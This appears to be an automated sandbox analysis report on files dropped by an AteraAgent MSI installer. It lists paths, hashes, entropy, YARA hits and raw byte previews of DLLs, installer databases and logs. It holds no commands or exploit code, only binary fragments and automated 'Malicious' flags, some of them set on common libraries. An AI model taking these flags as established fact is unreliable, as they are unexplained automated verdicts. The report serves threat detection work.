                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AteraAgent.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                                              MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                                              SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                                              SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                                              SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                              MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                              SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                              SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                              SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\692c41.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              MD5:7CE6669643890D209540D68E76C0CFCC
                                                                                                                                                                                                                                                                                              SHA1:C49DF2E823D5E2461A11C96AD4D36974C7FFFC9A
                                                                                                                                                                                                                                                                                              SHA-256:27F1CDF3422C4C87D9D273A62DF4404339119E416D16D8512479D87ACD07C12B
                                                                                                                                                                                                                                                                                              SHA-512:DFB7CDE9198FE29E9B8738AB2DDCA34DB87C3BE6D9EB1C68E507FFB59F4F9E66761AB84A1E40B4FA040AA061F214C2E2EA1EFCFC875BCCA44BDF947639EF10ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\692c43.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              MD5:7CE6669643890D209540D68E76C0CFCC
                                                                                                                                                                                                                                                                                              SHA1:C49DF2E823D5E2461A11C96AD4D36974C7FFFC9A
                                                                                                                                                                                                                                                                                              SHA-256:27F1CDF3422C4C87D9D273A62DF4404339119E416D16D8512479D87ACD07C12B
                                                                                                                                                                                                                                                                                              SHA-512:DFB7CDE9198FE29E9B8738AB2DDCA34DB87C3BE6D9EB1C68E507FFB59F4F9E66761AB84A1E40B4FA040AA061F214C2E2EA1EFCFC875BCCA44BDF947639EF10ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\692c44.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                                                                              MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                                                                              SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                                                                              SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                                                                              SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\692c50.msi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                                                                              MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                                                                              SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                                                                              SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                                                                              SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
